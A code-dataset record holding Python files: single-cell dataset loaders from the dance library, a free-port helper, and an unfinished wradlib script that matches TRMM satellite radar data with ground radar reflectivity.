available_data.append({key: i[key] for key in (\"split\", \"species\", \"tissue\", \"dataset\")})\n\n return bench_url_dict, available_data\n\n\n@register_dataset(\"CellTypeAnnotation\")\nclass CellTypeAnnotationDataset(BaseDataset):\n _DISPLAY_ATTRS = (\"species\", \"tissue\", \"train_dataset\", \"test_dataset\")\n ALL_URL_DICT: Dict[str, str] = {\n \"train_human_cell_atlas\": \"https://www.dropbox.com/s/1itq1pokplbqxhx?dl=1\",\n \"test_human_test_data\": \"https://www.dropbox.com/s/gpxjnnvwyblv3xb?dl=1\",\n \"train_mouse_cell_atlas\": \"https://www.dropbox.com/s/ng8d3eujfah9ppl?dl=1\",\n \"test_mouse_test_data\": \"https://www.dropbox.com/s/pkr28czk5g3al2p?dl=1\",\n } # yapf: disable\n BENCH_URL_DICT, AVAILABLE_DATA = _load_scdeepsort_metadata()\n\n def __init__(self, full_download=False, train_dataset=None, test_dataset=None, species=None, tissue=None,\n train_dir=\"train\", test_dir=\"test\", map_path=\"map\", data_dir=\"./\"):\n super().__init__(data_dir, full_download)\n\n self.data_dir = data_dir\n self.train_dataset = train_dataset\n self.test_dataset = test_dataset\n self.species = species\n self.tissue = tissue\n self.train_dir = train_dir\n self.test_dir = test_dir\n self.map_path = map_path\n\n def download_all(self):\n if self.is_complete():\n return\n\n # Download and overwrite\n for name, url in self.ALL_URL_DICT.items():\n download_unzip(url, self.data_dir)\n\n parts = name.split(\"_\") # [train|test]_{species}_[cell|test]_atlas\n download_path = osp.join(self.data_dir, \"_\".join(parts[1:]))\n move_path = osp.join(self.data_dir, *parts[:2])\n\n os.makedirs(osp.dirname(move_path), exist_ok=True)\n try:\n shutil.rmtree(move_path)\n except FileNotFoundError:\n pass\n os.rename(download_path, move_path)\n\n def get_all_filenames(self, filetype: str = \"csv\", feat_suffix: str = \"data\", label_suffix: str = \"celltype\"):\n filenames = []\n for id in self.train_dataset + self.test_dataset:\n filenames.append(f\"{self.species}_{self.tissue}{id}_{feat_suffix}.{filetype}\")\n filenames.append(f\"{self.species}_{self.tissue}{id}_{label_suffix}.{filetype}\")\n return filenames\n\n def download(self, download_map=True):\n if self.is_complete():\n return\n\n filenames = self.get_all_filenames()\n # Download training and testing data\n for name, url in self.BENCH_URL_DICT.items():\n parts = name.split(\"_\") # [train|test]_{species}_{tissue}{id}_[celltype|data].csv\n filename = \"_\".join(parts[1:])\n if filename 
in filenames:\n filepath = osp.join(self.data_dir, *parts[:2], filename)\n download_file(url, filepath)\n\n if download_map:\n # Download mapping data\n download_unzip(\"https://www.dropbox.com/sh/hw1189sgm0kfrts/AAAapYOblLApqygZ-lGo_70-a?dl=1\",\n osp.join(self.data_dir, \"map\"))\n\n def is_complete_all(self):\n \"\"\"Check if data is complete.\"\"\"\n check = [\n osp.join(self.data_dir, \"train\"),\n osp.join(self.data_dir, \"test\"),\n osp.join(self.data_dir, \"pretrained\")\n ]\n for i in check:\n if not osp.exists(i):\n logger.info(f\"file {i} doesn't exist\")\n return False\n return True\n\n def is_complete(self):\n \"\"\"Check if benchmarking data is complete.\"\"\"\n for name in self.BENCH_URL_DICT:\n if any(i not in name for i in (self.species, self.tissue)):\n continue\n filename = name[name.find(self.species):]\n file_i = osp.join(self.data_dir, *(name.split(\"_\"))[:2], filename)\n if not osp.exists(file_i):\n logger.info(file_i)\n logger.info(f\"file {filename} doesn't exist\")\n return False\n # check maps\n map_check = [\n osp.join(self.data_dir, \"map\", \"mouse\", \"map.xlsx\"),\n osp.join(self.data_dir, \"map\", \"human\", \"map.xlsx\"),\n osp.join(self.data_dir, \"map\", \"celltype2subtype.xlsx\")\n ]\n for file in map_check:\n if not osp.exists(file):\n logger.info(f\"file {name} doesn't exist\")\n return False\n return True\n\n def _load_raw_data(self, ct_col: str = \"Cell_type\") -> Tuple[ad.AnnData, List[Set[str]], List[str], int]:\n species = self.species\n tissue = self.tissue\n train_dataset_ids = self.train_dataset\n test_dataset_ids = self.test_dataset\n data_dir = self.data_dir\n train_dir = osp.join(data_dir, self.train_dir)\n test_dir = osp.join(data_dir, self.test_dir)\n map_path = osp.join(data_dir, self.map_path, self.species)\n\n # Load raw data\n train_feat_paths, train_label_paths = self._get_data_paths(train_dir, species, tissue, train_dataset_ids)\n test_feat_paths, test_label_paths = self._get_data_paths(test_dir, species, tissue, test_dataset_ids)\n train_feat, test_feat = (self._load_dfs(paths, transpose=True) for paths in (train_feat_paths, test_feat_paths))\n train_label, test_label = (self._load_dfs(paths) for paths in (train_label_paths, test_label_paths))\n\n # Combine features (only use features that are present in the training data)\n train_size = train_feat.shape[0]\n feat_df = pd.concat(train_feat.align(test_feat, axis=1, join=\"left\", fill_value=0)).fillna(0)\n adata = ad.AnnData(feat_df, dtype=np.float32)\n\n # Convert cell type labels and map test cell type names to train\n cell_types = set(train_label[ct_col].unique())\n idx_to_label = sorted(cell_types)\n cell_type_mappings: Dict[str, Set[str]] = self.get_map_dict(map_path, tissue)\n train_labels, test_labels = train_label[ct_col].tolist(), []\n for i in test_label[ct_col]:\n test_labels.append(i if i in cell_types else cell_type_mappings.get(i))\n labels: List[Set[str]] = train_labels + test_labels\n\n logger.debug(\"Mapped test cell-types:\")\n for i, j, k in zip(test_label.index, test_label[ct_col], test_labels):\n logger.debug(f\"{i}:{j}\\t-> {k}\")\n\n logger.info(f\"Loaded expression data: {adata}\")\n logger.info(f\"Number of training samples: {train_feat.shape[0]:,}\")\n logger.info(f\"Number of testing samples: {test_feat.shape[0]:,}\")\n logger.info(f\"Cell-types (n={len(idx_to_label)}):\\n{pprint.pformat(idx_to_label)}\")\n\n return adata, labels, idx_to_label, train_size\n\n def _raw_to_dance(self, raw_data):\n adata, cell_labels, idx_to_label, train_size = raw_data\n 
adata.obsm[\"cell_type\"] = cell_label_to_df(cell_labels, idx_to_label, index=adata.obs.index)\n data = Data(adata, train_size=train_size)\n return data\n\n @staticmethod\n def _get_data_paths(data_dir: str, species: str, tissue: str, dataset_ids: List[str], *, filetype: str = \"csv\",\n feat_suffix: str = \"data\", label_suffix: str = \"celltype\") -> Tuple[List[str], List[str]]:\n feat_paths, label_paths = [], []\n for path_list, suffix in zip((feat_paths, label_paths), (feat_suffix, label_suffix)):\n for i in dataset_ids:\n path_list.append(osp.join(data_dir, species, f\"{species}_{tissue}{i}_{suffix}.{filetype}\"))\n return feat_paths, label_paths\n\n @staticmethod\n def _load_dfs(paths: List[str], *, index_col: Optional[int] = 0, transpose: bool = False, **kwargs):\n dfs = []\n for path in paths:\n logger.info(f\"Loading data from {path}\")\n # TODO: load feat as csr\n df = pd.read_csv(path, index_col=index_col, **kwargs)\n # Labels: cell x cell-type; Data: feature x cell (need to transpose)\n df = df.T if transpose else df\n # Add dataset info to index\n dataset_name = \"_\".join(osp.basename(path).split(\"_\")[:-1])\n df.index = dataset_name + \"_\" + df.index.astype(str)\n dfs.append(df)\n combined_df = pd.concat(dfs)\n return combined_df\n\n @staticmethod\n def get_map_dict(map_file_path: str, tissue: str) -> Dict[str, Set[str]]:\n \"\"\"Load cell-type mappings.\n\n Parameters\n ----------\n map_file_path\n Path to the mapping file.\n tissue\n Tissue of interest.\n\n Notes\n -----\n Merge mapping across all test sets for the required tissue.\n\n \"\"\"\n map_df = pd.read_excel(osp.join(map_file_path, \"map.xlsx\"))\n map_dict = collections.defaultdict(set)\n for _, row in map_df.iterrows():\n if row[\"Tissue\"] == tissue:\n map_dict[row[\"Celltype\"]].add(row[\"Training dataset cell type\"])\n return dict(map_dict)\n\n\n@register_dataset(\"clustering\")\nclass ClusteringDataset(BaseDataset):\n \"\"\"Data downloading and loading for clustering.\n\n Parameters\n ----------\n data_dir\n Path to store datasets.\n dataset\n Choice of dataset. 
Available options are '10X_PBMC', 'mouse_bladder_cell', 'mouse_ES_cell', 'worm_neuron_cell'.\n\n    \"\"\"\n\n    URL_DICT = load_data_url_dict_from_csv(METADIR / \"clustering.csv\")\n    AVAILABLE_DATA = sorted(URL_DICT)\n\n    def __init__(self, data_dir: str = \"./data\", dataset: str = \"mouse_bladder_cell\"):\n        super().__init__(data_dir, full_download=False)\n        self.data_dir = data_dir\n        self.dataset = dataset\n\n    @property\n    def data_path(self) -> str:\n        return osp.join(self.data_dir, f\"{self.dataset}.h5\")\n\n    def download(self):\n        download_file(self.URL_DICT[self.dataset], self.data_path)\n\n    def is_complete(self):\n        return osp.exists(self.data_path)\n\n    def _load_raw_data(self) -> Tuple[ad.AnnData, np.ndarray]:\n        with h5py.File(self.data_path, \"r\") as f:\n            x = np.array(f[\"X\"])\n            y = np.array(f[\"Y\"])\n        adata = ad.AnnData(x, dtype=np.float32)\n        return adata, y\n\n    def _raw_to_dance(self, raw_data: Tuple[ad.AnnData, np.ndarray]):\n        adata, y = raw_data\n        adata.obsm[\"Group\"] = y\n        data = Data(adata, train_size=\"all\")\n        return data\n\n\n@register_dataset(\"imputation\")\nclass ImputationDataset(BaseDataset):\n    URL = load_data_url_dict_from_csv(METADIR / \"imputation.csv\")\n    DATASET_TO_FILE = IMPUTATION_DATASET_TO_FILE  # yapf: disable\n    AVAILABLE_DATA = sorted(URL)\n\n    def __init__(self, data_dir=\"data\", dataset=\"human_stemcell\", train_size=0.1):\n        super().__init__(data_dir, full_download=False)\n        self.data_dir = data_dir\n        self.dataset = dataset\n        self.train_size = train_size\n\n    def download(self):\n\n        gene_class = [\n            \"pbmc_data\", \"mouse_brain_data\", \"mouse_embryo_data\", \"human_stemcell_data\", \"human_breast_TGFb_data\",\n            \"human_breast_Dox_data\", \"human_melanoma_data\", \"mouse_visual_data\"\n        ]\n\n        file_name = {\n            \"pbmc_data\": \"5k.zip?dl=0\",\n            \"mouse_embryo_data\": \"GSE65525.zip?dl=0\",\n            \"mouse_brain_data\": \"neuron_10k.zip?dl=0\",\n            \"human_stemcell_data\": \"GSE75748.zip?dl=0\",\n            \"human_breast_TGFb_data\": \"GSE114397.zip?dl=0\",\n            \"human_breast_Dox_data\": \"GSM3141014.zip?dl=0\",\n            \"human_melanoma_data\": \"human_melanoma_data.zip?dl=0\",\n            \"mouse_visual_data\": \"mouse_visual_data.zip?dl=0\"\n        }\n\n        dl_files = {\n            \"pbmc_data\": \"5k_*\",\n            \"mouse_embryo_data\": \"GSE65525\",\n            \"mouse_brain_data\": \"neuron*\",\n            \"human_stemcell_data\": \"GSE75748\",\n            \"human_breast_TGFb_data\": \"GSE11*\",\n            \"human_breast_Dox_data\": \"GSM31*\",\n            \"human_melanoma_data\": \"human*\",\n            \"mouse_visual_data\": \"GSM27*\"\n        }\n\n        if sys.platform != 'win32':\n            if not osp.exists(self.data_dir):\n                os.system(\"mkdir \" + self.data_dir)\n            if not osp.exists(self.data_dir + \"/train\"):\n                os.system(\"mkdir \" + self.data_dir + \"/train\")\n\n            for class_name in gene_class:\n                if self.dataset == class_name or self.dataset + \"_data\" == class_name:\n                    if not any(map(osp.exists, glob(osp.join(self.data_dir, \"train\", class_name,\n                                                             dl_files[class_name])))):\n                        os.system(\"mkdir \" + self.data_dir + \"/train/\" + class_name)\n                        os.system(\"wget \" + self.URL[class_name])  # assumes linux... 
mac needs to install\n                        os.system(\"unzip \" + file_name[class_name])\n                        os.system(\"rm \" + file_name[class_name])\n                        os.system(\"mv \" + dl_files[class_name] + \" \" + self.data_dir + \"/train/\" + class_name + \"/\")\n            os.system(\"cp -r \" + self.data_dir + \"/train/ \" + self.data_dir + \"/test\")\n        if sys.platform == 'win32':\n            if not osp.exists(self.data_dir):\n                os.system(\"mkdir \" + self.data_dir)\n            if not osp.exists(self.data_dir + \"/train\"):\n                os.mkdir(self.data_dir + \"/train\")\n            for class_name in gene_class:\n                if self.dataset == class_name or self.dataset + \"_data\" == class_name:\n                    if not any(map(osp.exists, glob(osp.join(self.data_dir, \"train\", class_name,\n                                                             dl_files[class_name])))):\n                        os.mkdir(self.data_dir + \"/train/\" + class_name)\n                        os.system(\"curl \" + self.URL[class_name])\n                        os.system(\"tar -xf \" + file_name[class_name])\n                        os.system(\"del -R \" + file_name[class_name])\n                        os.system(\"move \" + dl_files[class_name] + \" \" + self.data_dir + \"/train/\" + class_name + \"/\")\n            os.system(\"copy /r \" + self.data_dir + \"/train/ \" + self.data_dir + \"/test\")\n\n    def is_complete(self):\n        # check whether data is complete or not\n        check = [\n            self.data_dir + \"/train\",\n            self.data_dir + \"/test\",\n        ]\n\n        for i in check:\n            if not osp.exists(i):\n                logger.info(\"file {} doesn't exist\".format(i))\n                return False\n        return True\n\n    def _load_raw_data(self) -> ad.AnnData:\n        if self.dataset[-5:] != '_data':\n            dataset = self.dataset + '_data'\n        else:\n            dataset = self.dataset\n\n        if self.dataset == 'mouse_embryo' or self.dataset == 'mouse_embryo_data' or self.dataset == \"mouse_visual_data\":\n            for i in range(len(self.DATASET_TO_FILE[dataset])):\n                fname = self.DATASET_TO_FILE[dataset][i]\n                data_path = f'{self.data_dir}/train/{dataset}/{fname}'\n                if i == 0:\n                    counts = pd.read_csv(data_path, header=None, index_col=0)\n                    time = pd.Series(np.zeros(counts.shape[1]))\n                else:\n                    x = pd.read_csv(data_path, header=None, index_col=0)\n                    time = pd.concat([time, pd.Series(np.zeros(x.shape[1])) + i])\n                    counts = pd.concat([counts, x], axis=1)\n            time = pd.DataFrame(time)\n            time.columns = ['time']\n            counts = counts.T\n            counts.index = [i for i in range(counts.shape[0])]\n            adata = ad.AnnData(csr_matrix(counts.values))\n            adata.var_names = counts.columns.tolist()\n            adata.obs['time'] = time.to_numpy()\n        else:\n            data_path = osp.join(self.data_dir, \"train\", dataset, self.DATASET_TO_FILE[dataset])\n            if not os.path.exists(data_path):\n                raise FileNotFoundError(f\"{data_path} does not exist\")\n\n            if self.DATASET_TO_FILE[dataset][-3:] == 'csv':\n                counts = pd.read_csv(data_path, header=None, index_col=0)\n                nums = pd.Series(np.arange(counts.shape[1]))\n                nums = pd.DataFrame(nums)\n                nums.columns = ['nums']\n                counts = counts.T\n                counts.index = [i for i in range(counts.shape[0])]\n                adata = ad.AnnData(csr_matrix(counts.values))\n                adata.var_names = counts.columns.tolist()\n                adata.obs['nums'] = nums.to_numpy()\n            if self.DATASET_TO_FILE[dataset][-2:] == 'gz':\n                counts = pd.read_csv(data_path, index_col=0, compression='gzip', header=0)\n                counts = counts.T\n                adata = ad.AnnData(csr_matrix(counts.values))\n                # adata.obs_names = [\"%d\" % i for i in range(adata.shape[0])]\n                adata.obs_names = counts.index.tolist()\n                adata.var_names = counts.columns.tolist()\n            elif self.DATASET_TO_FILE[dataset][-2:] == 'h5':\n                adata = sc.read_10x_h5(data_path)\n                adata.var_names_make_unique()\n\n        return adata\n\n    def _raw_to_dance(self, raw_data: ad.AnnData):\n        adata = raw_data\n        data = Data(adata, train_size=int(adata.n_obs * self.train_size))\n        return 
data\n","repo_name":"OmicsML/dance","sub_path":"dance/datasets/singlemodality.py","file_name":"singlemodality.py","file_ext":"py","file_size_in_byte":18268,"program_lang":"python","lang":"en","doc_type":"code","stars":269,"dataset":"github-code","pt":"53"} +{"seq_id":"4384639515","text":"# chose a random server from machines.json\nimport random\nimport logging\nimport socket\nlogging.basicConfig(level=logging.INFO)\n\n\ndef get_free_port():\n while True:\n port = random.randint(32768, 61000)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n if sock.connect_ex(('127.0.0.1', port)): # returns non-zero if connection is unsuccessful -> port is free\n return port\n else:\n sock.close()\n","repo_name":"harikrishnanum/Distributed-IOT-ML-Platform","sub_path":"deployer/deployer/load_balancer/loadbalancer.py","file_name":"loadbalancer.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"28268455432","text":"import wradlib as wradlib\nimport matplotlib.pyplot as pl\nimport matplotlib as mpl\nfrom matplotlib.collections import PatchCollection\nfrom matplotlib.colors import from_levels_and_colors\nfrom matplotlib.path import Path\nimport matplotlib.patches as patches\nimport matplotlib.cm as cm\nimport warnings\nwarnings.filterwarnings('ignore')\ntry:\n get_ipython().magic(\"matplotlib inline\")\nexcept:\n pl.ion()\nimport numpy as np\nimport datetime as dt\nfrom osgeo import osr\nfrom osgeo import gdal\nimport wradlib as wrl\nimport datetime as dt\nimport numpy as np\nfrom wradlib.io import read_generic_netcdf\nfrom wradlib.util import get_wradlib_data_file\nimport os\nfrom external import *\nimport os\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n#from mpl_toolkits.basemap import Basemap\nimport numpy as np\nimport scipy.io as sio\nfrom pyhdf.SD import SD, SDC\ndef read_trmm_pyhdf(filename1, filename2):\n\n hdf=SD(filename1, SDC.READ)\n hdf_1 = SD(filename2, SDC.READ)\n lat = hdf.select('Latitude')\n lat = lat[:,:]\n lon = hdf.select('Longitude')\n lon = lon[:,:]\n year = hdf.select('Year')\n year = year[:]\n month = hdf.select('Month')\n month = month[:]\n dayofmonth = hdf.select('DayOfMonth')\n dayofmonth = dayofmonth[:]\n dayofyear = hdf.select('DayOfYear')\n dayofyear = dayofyear[:]\n hour = hdf.select('Hour')\n hour=hour[:]\n minute = hdf.select('Minute')\n minute=minute[:]\n second = hdf.select('Second')\n second = second[:]\n millisecond = hdf.select('MilliSecond')\n millisecond=millisecond[:]\n date_array = zip(year, month, dayofmonth,\n hour, minute, second,\n millisecond.astype(np.int32) * 1000)\n pr_time = np.array([dt.datetime(d[0], d[1], d[2], d[3], d[4], d[5], d[6]) for d in\n date_array])\n status = hdf.select('status')\n status = status[:,:]\n pflag = hdf.select('rainFlag') \n pflag = pflag[:,:]\n ptype = hdf.select('rainType') \n ptype = pflag[:,:]\n zbb = hdf.select('HBB')\n zbb = zbb[:,:].astype(np.float32)\n bbwidth = hdf.select('BBwidth')\n bbwidth = bbwidth[:,:].astype(np.float32)\n bbstatus = hdf.select('BBstatus')\n bbstatus = bbstatus[:,:]\n refl = hdf_1.select('correctZFactor')\n refl = refl[:,:].astype(np.float32)\n refl[refl == -8888.] = np.nan\n refl[refl == -9999.] 
= np.nan\n refl = refl / 100.\n quality = hdf_1.select('dataQuality')\n quality = quality[:]\n\n # Check for bad data\n if max(quality) != 0:\n raise ValueError('TRMM contains Bad Data')\n\n # Determine the dimensions\n ndim = refl.ndim\n if ndim != 3:\n raise ValueError('TRMM Dimensions do not match!'\n 'Needed 3, given {0}'.format(ndim))\n\n tmp = refl.shape\n nscan = tmp[0]\n nray = tmp[1]\n nbin = tmp[2]\n\n # Reverse direction along the beam\n # TODO: Why is this reversed?\n refl = refl[::-1]\n\n # Simplify the precipitation flag\n ipos = (pflag >= 10) & (pflag < 20)#check when not using equal to\n icer = (pflag == 20)\n pflag[ipos] = 1\n pflag[icer] = 2\n\n # Simplify the precipitation types\n istr = (ptype >= 100) & (ptype <= 200)\n icon = (ptype >= 200) & (ptype <= 300)\n ioth = (ptype >= 300)\n inone = (ptype == -88)\n imiss = (ptype == -99)\n ptype[istr] = 1 #type of rain stratiform \n ptype[icon] = 2 #type of rain convective\n ptype[ioth] = 3 #type of rain other type\n ptype[inone] = 0\n ptype[imiss] = -1\n\n # Extract the surface type #modify\n sfc = np.zeros((nscan, nray), dtype=np.uint8)\n i0 = (status % 10 == 0)\n sfc[i0] = 0 #ocean\n i1 = ((status - 1) % 10 == 0)\n sfc[i1] = 1 #land\n i2 = ((status - 2) % 10 == 0)\n sfc[i2] = 2 #coastline\n i3 = ((status - 4) % 10 == 0)\n sfc[i3] = 4 #inland lake\n i9 = ((status - 9) % 10 == 0)\n sfc[i9] = 9 #inland\n \n # bright band detection status\n #bb_detection_status = np.zeros((nscan, nray), dtype=np.uint8)\n #bb_detection_status[bbstatus == -11] = 0\n #k_1 = (0 < (bbstatus/16)) & ((bbstatus/16) < 50)\n #bb_detection_status[k_1] = 1\n #k_2 = (50 < (bbstatus/16)) & ((bbstatus/16) < 109)\n #bb_detection_status[k_2] = 2\n# Extract 2A23 quality\n# TODO: Why is the `quality` variable overwritten?\n# quality = np.zeros((nscan, nray), dtype=np.uint8)\n# i0 = (status == 168)\n# quality[i0] = 0\n #i1 = ((bb_detection_status == 0) | (bb_detection_status == 1)) & (ptype == 1)\n #quality[i1] = 1\n #i2 = (bb_detection_status > 1) & (ptype >= 1)\n #quality[i2] = 2\n quality = np.zeros((nscan, nray), dtype=np.uint8)\n i0 = (status == 168)\n quality[i0] = 0\n i1 = (status < 50)\n quality[i1] = 1\n i2 = ((status >= 50) & (status < 109))\n quality[i2] = 2\n trmm_data = {}\n trmm_data.update({'nscan': nscan, 'nray': nray, 'nbin': nbin,\n 'date': pr_time, 'lon': lon, 'lat': lat,\n 'pflag': pflag, 'ptype': ptype, 'zbb': zbb,\n 'bbwidth': bbwidth, 'sfc': sfc, 'quality': quality,\n 'refl': refl, 'bbstatus': bbstatus})\n return trmm_data\n\ndef _get_tilts(dic):\n i = 0\n for k in dic.keys():\n if 'dataset' in k:\n i += 1\n return i\n\ndef read_gr(filename, loaddata=True):\n\n gr_data = wrl.io.read_generic_netcdf(filename)\n dat = gr_data['what']['date']\n tim = gr_data['what']['time']\n date = dt.datetime.strptime(dat + tim, \"%Y%d%m%H%M%S\")\n source = gr_data['what']['source']\n\n lon = gr_data['where']['lon']\n lat = gr_data['where']['lat']\n alt = gr_data['where']['height']\n\n if gr_data['what']['object'] == 'PVOL':\n ntilt = _get_tilts(gr_data)\n else:\n raise ValueError('GR file is no PPI/Volume File')\n\n ngate = np.zeros(ntilt, dtype=np.int16)\n nbeam = np.zeros(ntilt)\n elang = np.zeros(ntilt)\n r0 = np.zeros(ntilt)\n dr = np.zeros(ntilt)\n a0 = np.zeros(ntilt)\n\n for i in range(0, ntilt):\n dset = gr_data['dataset{0}'.format(i+1)]\n a0[i] = dset['how']['astart']\n elang[i] = dset['where']['elangle']\n ngate[i] = dset['where']['nbins']\n r0[i] = dset['where']['rstart']\n dr[i] = dset['where']['rscale']\n nbeam[i] = dset['where']['nrays']\n\n if 
((len(np.unique(r0)) != 1) |\n            (len(np.unique(dr)) != 1) |\n            (len(np.unique(a0)) != 1) |\n            (len(np.unique(nbeam)) != 1) |\n            (nbeam[0] != 360)):\n        raise ValueError('GroundRadar Data layout does not match')\n\n    gr_dict = {}\n    gr_dict.update({'source': source, 'date': date, 'lon': lon, 'lat': lat,\n                    'alt': alt, 'ngate': ngate, 'nbeam': nbeam, 'ntilt': ntilt,\n                    'r0': r0, 'dr': dr, 'a0': a0, 'elang': elang})\n    if not loaddata:\n        return gr_dict\n\n    sdate = []\n    refl = []\n    for i in range(0, ntilt):\n        dset = gr_data['dataset{0}'.format(i+1)]\n        dat = dset['what']['startdate']\n        tim = dset['what']['starttime']\n        date = dt.datetime.strptime(dat + tim, \"%Y%d%m%H%M%S\")\n        sdate.append(date)\n        data = dset['data1']\n        quantity = data['what']['quantity']\n        factor = data['what']['gain']\n        offset = data['what']['offset']\n        if quantity == 'DBZH':\n            dat = data['variables']['data']['data'] * factor + offset\n            refl.append(dat)\n\n    sdate = np.array(sdate)\n    refl = np.array(refl)\n\n    gr_dict.update({'sdate': sdate, 'refl': refl})\n\n    return gr_dict\n\n# Set parameters for this procedure\nbw_pr = 0.71                  # PR beam width\nplatf = \"trmm\"                # PR platform/product: one out of [\"gpm\", \"trmm_2a23\", \"trmm_2a25\"]\nzt = pr_pars[platf][\"zt\"]     # PR orbit height (meters)\ndr_pr = pr_pars[platf][\"dr\"]  # PR gate length (meters)\nee = 2\n\n# define GPM data set\n#gpm_file = wradlib.util.get_wradlib_data_file('gpm/2A-RW-BRS.GPM.Ku.V6-20160118.20141206-S095002-E095137.004383.V04A.HDF5')\n\n# define matching ground radar file\ngr2gpm_file = wradlib.util.get_wradlib_data_file('hdf5/IDR66_20141206_094829.vol.h5')\n\n# define TRMM data sets\ntrmm_2a23_file = wradlib.util.get_wradlib_data_file('trmm/2A-CS-151E24S154E30S.TRMM.PR.2A23.20100206-S111425-E111526.069662.7.HDF')\ntrmm_2a25_file = wradlib.util.get_wradlib_data_file('trmm/2A-CS-151E24S154E30S.TRMM.PR.2A25.20100206-S111425-E111526.069662.7.HDF')\n\n# define matching ground radar file\ngr2trmm_file = wradlib.util.get_wradlib_data_file('hdf5/IDR66_20100206_111233.vol.h5')\n#alok_file_a=trmm_2a23_file[-11:-6]\n#alok_file_b=trmm_2a23_file[-20:-11]\n#alok_file_c=gr2trmm_file[-10:-2]\n#alok_file_d=alok_file_c+alok_file_b+alok_file_a\n#alok_file_coord='coordinates.'+alok_file_d+'.mat'\n#alok_file_refl='reflectivity.'+alok_file_d+'.mat'\n#alok_file_refl_text_file='reflectivity.'+alok_file_d+'.txt'\n#overpass_orbit=['88616','88738','89028','89138','89486','89547','89608','89611','89669','89718']\n#overpass_orbit_time=[1.0, -2.0, -3.0, -3.0, 0.0, -4.0, 0.0, -3.0, -5.0, -1.0]\n#for ii in range(len(overpass_orbit)):\n#    if (overpass_orbit[ii]==trmm_2a23_file[-11:-6]):\n#        time_diff_for_orbit=overpass_orbit_time[ii]\n#sweep_no=alok_file_c[-3:-1]\n#sweep_no=float(sweep_no)\n#if sweep_no>1.0:\n#    time_diff_for_orbit=time_diff_for_orbit+(sweep_no-1)\n#else:\n#    time_diff_for_orbit=time_diff_for_orbit\n\n# read matching GR data\nif platf == \"gpm\":\n    gr_data = read_gr2(gr2gpm_file)\nelif platf==\"trmm\":\n    gr_data = read_gr(gr2trmm_file)\nelse:\n    raise ValueError(\"Invalid platform\")\n\n# number of rays in gr sweep\nnray_gr = gr_data['nbeam'].astype(\"i4\")[ee]\n# number of gates in gr beam\nngate_gr = gr_data['ngate'].astype(\"i4\")[ee]\n# number of sweeps\nnelev = gr_data['ntilt']\n# elevation of sweep (degree)\nelev = gr_data['elang'][ee]\n# gate length (meters)\ndr_gr = gr_data['dr'][ee]\n# reflectivity array of sweep\nref_gr = gr_data['refl'][ee]\n# sweep datetime stamp\ndate_gr = gr_data['sdate'][ee]\n# range of first gate\nr0_gr = gr_data['r0'][ee]\n# azimuth angle of first beam\na0_gr = 
gr_data['a0'][ee]\n# Longitude of GR\nlon0_gr = gr_data['lon']\n# Latitude of GR\nlat0_gr = gr_data['lat']\n# Altitude of GR (meters)\nalt0_gr = gr_data['alt']\n# Beam width of GR (degree)\nbw_gr = 1.\nprint(elev, lon0_gr)\n\n# read spaceborne PR data\nif platf == \"gpm\":\n    pr_data = read_gpm(gpm_file)\nelif platf == \"trmm\":\n    pr_data = read_trmm_pyhdf(trmm_2a23_file, trmm_2a25_file)\nelse:\n    raise ValueError(\"Invalid platform\")\nrefl = pr_data['refl']\n#print(refl)\n# Longitudes of PR scans\npr_lon = pr_data['lon']\n# Latitudes of PR scans\npr_lat = pr_data['lat']\n# Precip flag\npflag = pr_data['pflag']\n# Number of scans on PR data\nnscan_pr= pr_data['nscan']\n# Number of rays in one PR scan\nnray_pr = pr_data['nray']\n# Number of gates in one PR ray\nngate_pr = pr_data['nbin']\n# Precipitation type\nprecipitation_type = pr_data['ptype']\n##\n# Calculate equivalent earth radius\nwgs84 = wradlib.georef.get_default_projection()\nre1 = wradlib.georef.get_earth_radius(lat0_gr, wgs84) * 4./3.\nprint(\"eff. Earth radius 1:\", re1)\na = wgs84.GetSemiMajor()\nb = wgs84.GetSemiMinor()\nprint(\"SemiMajor, SemiMinor:\", a, b)\n\n# Set up aeqd-projection gr-centered\nrad = wradlib.georef.proj4_to_osr(('+proj=aeqd +lon_0={lon:f} ' + \n                                   '+lat_0={lat:f} +a={a:f} ' +\n                                   '+b={b:f}').format(lon=lon0_gr,\n                                                      lat=lat0_gr,\n                                                      a=a, b=b))\nre2 = wradlib.georef.get_earth_radius(lat0_gr, rad) * 4./3.\nprint(\"eff. Earth radius 2:\", re2)\n\n# TODO: Separate the insides of wradlib.georef.polar2lonlatalt_n \n\n# create gr range and azimuth arrays\nrmax_gr = r0_gr + ngate_gr * dr_gr\nr_gr = np.arange(0, ngate_gr) * dr_gr + dr_gr/2.\naz_gr = np.arange(0, nray_gr) - a0_gr\nprint(\"Range/Azi-Shape:\", r_gr.shape, az_gr.shape)\n\n# create gr lonlat grid ##alok modified (check for lat lon grid)\ngr_polargrid = np.meshgrid(r_gr, az_gr)\n## alok modified (check for lat lon grid) gr_lon, gr_lat, gr_alt = wradlib.georef.polar2lonlatalt_n(gr_polargrid[0], gr_polargrid[1], elev, (lon0_gr, lat0_gr, alt0_gr ))\n## alok modified (check for lat lon grid) gr_ll = np.dstack((gr_lon, gr_lat, gr_alt))\n## alok modified (check for lat lon grid) print(\"LonLatAlt-Grid-Shape\", gr_ll.shape)\n\n# reproject to xyz\n## alok modified (check for lat lon grid) gr_xyz = wradlib.georef.reproject(gr_ll, projection_source=wgs84, projection_target=rad)\ngr_xyz,rad = wradlib.georef.spherical_to_xyz(gr_polargrid[0], gr_polargrid[1], elev, (lon0_gr, lat0_gr, alt0_gr )) ## alok modified (check for lat lon grid)\nprint(\"XYZ-Grid-Shape:\", gr_xyz.shape)\n\n# get radar domain (outer ring)\ngr_domain = gr_xyz[:,-1,0:2]\ngr_domain = np.vstack((gr_domain, gr_domain[0]))\nprint(\"Domain-Shape:\", gr_domain.shape)\n\npr_x, pr_y = wradlib.georef.reproject(pr_lon, pr_lat, \n                                      projection_source=wgs84, \n                                      projection_target=rad)\npr_xy = np.dstack((pr_x, pr_y))\nprint(\"PR-GRID-Shapes:\", pr_x.shape, pr_y.shape, pr_xy.shape)\n\n# Create ZonalData for spatial subsetting (inside GR range domain)\n## alok modified (14/1/2019) l_gr = []\n## alok modified (14/1/2019) l_gr.append(gr_domain)\n## alok modified (14/1/2019) zd = wradlib.zonalstats.ZonalDataPoint(pr_xy.reshape(-1, pr_xy.shape[-1]), l_gr, srs=rad, buf=500.)\n## alok modified (14/1/2019) obj1 = 